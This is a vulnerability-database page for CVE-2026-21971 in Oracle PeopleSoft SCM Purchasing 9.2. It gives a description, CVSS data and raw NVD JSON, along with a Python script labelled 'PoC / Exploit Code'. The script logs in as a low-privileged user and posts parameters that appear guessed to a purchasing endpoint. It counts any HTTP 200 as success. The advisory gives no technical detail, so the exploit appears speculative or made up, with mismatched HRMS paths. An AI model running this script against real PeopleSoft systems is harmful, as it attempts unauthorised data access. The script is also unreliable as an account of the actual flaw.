Security Vulnerability Report
CVE-2026-21971 CVSS 5.4 MEDIUM

CVE-2026-21971

Published: 2026-01-20 22:16:00
Last Modified: 2026-01-29 14:47:27

Description

Vulnerability in the PeopleSoft Enterprise SCM Purchasing product of Oracle PeopleSoft (component: Purchasing). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM Purchasing. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise SCM Purchasing accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise SCM Purchasing accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_supply_chain_management_purchasing:9.2:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise SCM Purchasing 9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-21971 PoC - Oracle PeopleSoft SCM Purchasing Unauthorized Data Access
# This PoC demonstrates the vulnerability pattern (for authorized testing only)

import requests
import sys

# Configuration
TARGET_URL = "https://vulnerable-server/psp/ps/"
CVE_ID = "CVE-2026-21971"


def test_vulnerability(target_url, username, password):
    """
    Test for CVE-2026-21971: Unauthorized data access in PeopleSoft Purchasing
    This script demonstrates the vulnerability pattern for authorized security testing.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # Step 1: Authentication (using low-privileged account)
    login_data = {
        "userid": username,
        "pwd": password,
        ".ptlang": "ENG",
        ".ptinstalledlang": "ENG"
    }

    session = requests.Session()
    try:
        # Attempt login
        login_response = session.post(target_url + "EMPLOYEE/HRMS/c/PTPP_PORTAL_ROOT_OBJECT",
                                      data=login_data, headers=headers, verify=False, timeout=30)
        if login_response.status_code == 200:
            # Step 2: Access Purchasing module with low privileges
            purchasing_url = target_url + "EMPLOYEE/HRMS/c/PSC_PURCHASING"
            purchasing_response = session.get(purchasing_url, headers=headers, timeout=30)
            if purchasing_response.status_code == 200:
                # Step 3: Attempt unauthorized data access
                # This demonstrates the vulnerability pattern
                exploit_data = {
                    "ICAction": "PSC_PURCHASE_REQ",
                    "PTADD": "1",
                    "BUSINESS_UNIT": "US001"
                }
                exploit_response = session.post(purchasing_url, data=exploit_data,
                                                headers=headers, timeout=30)
                # Check if unauthorized access was successful
                # Note: an HTTP 200 alone is a weak indicator; PeopleSoft returns 200 for
                # many error and login pages, so the response body must be reviewed manually.
                if exploit_response.status_code == 200:
                    print(f"[!] {CVE_ID} Vulnerability may be present - unauthorized access detected")
                    return True
        print(f"[*] {CVE_ID} Testing completed")
        return False
    except requests.RequestException as e:
        print(f"[*] Error during testing: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} https://peoplesoft.example.com/ps/ testuser testpass")
        sys.exit(1)
    test_vulnerability(sys.argv[1], sys.argv[2], sys.argv[3])
```

References

https://www.oracle.com/security-alerts/cpujan2026.html (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-21971",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T22:16:00.210",
    "lastModified": "2026-01-29T14:47:26.827",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the PeopleSoft Enterprise SCM Purchasing product of Oracle PeopleSoft (component: Purchasing). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM Purchasing. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise SCM Purchasing accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise SCM Purchasing accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)."
      },
      {
        "lang": "es",
        "value": "Vulnerabilidad en el producto PeopleSoft Enterprise SCM Purchasing de Oracle PeopleSoft (componente: Purchasing). La versión compatible que se ve afectada es 9.2. Vulnerabilidad fácilmente explotable permite a un atacante con pocos privilegios y acceso a la red vía HTTP comprometer PeopleSoft Enterprise SCM Purchasing. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de actualización, inserción o eliminación a algunos de los datos accesibles de PeopleSoft Enterprise SCM Purchasing, así como acceso de lectura no autorizado a un subconjunto de los datos accesibles de PeopleSoft Enterprise SCM Purchasing. Puntuación Base CVSS 3.1 de 5.4 (Impactos en la Confidencialidad e Integridad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:peoplesoft_supply_chain_management_purchasing:9.2:*:*:*:*:*:*:*",
                "matchCriteriaId": "33380872-8382-41C9-B640-35FA5DCF1046"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/cpujan2026.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```